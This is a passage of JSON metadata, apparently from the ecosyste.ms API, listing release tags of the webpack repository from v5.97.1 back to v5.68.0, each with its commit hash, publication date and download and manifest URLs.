_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack